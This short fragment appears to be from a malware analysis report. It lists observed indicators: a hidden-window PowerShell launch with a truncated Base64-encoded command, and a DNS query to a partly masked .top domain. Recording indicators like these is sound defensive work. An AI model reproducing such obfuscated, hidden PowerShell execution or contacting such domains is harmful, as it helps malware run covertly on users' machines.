Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABPADAAWABVAFEAVgBzAHUAPQAnAFMAYQBqAFEASgB2AHcAJwA7ACQAWABaAFIAcgBRAGsAIAA9ACAAJwA0ADkANwAnADsAJABTAGkATABTAG0ARgA9ACcARQB3AGEATgBaADEAJwA7ACQAcAB3ADcAXwBHAEoAWABsAD0AJABlAG4AdgA6AHUAcw...
- DNS ASK jj####bbthb7.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABPADAAWABVAFEAVgBzAHUAPQAnAFMAYQBqAFEASgB2AHcAJwA7ACQAWABaAFIAcgBRAGsAIAA9ACAAJwA0ADkANwAnADsAJABTAGkATABTAG0ARgA9ACcARQB3AGEATgBaADEAJwA7ACQAcAB3ADcAXwBHAEoAWABsAD0AJABlAG4AdgA6AHUAcw...' (with hidden window)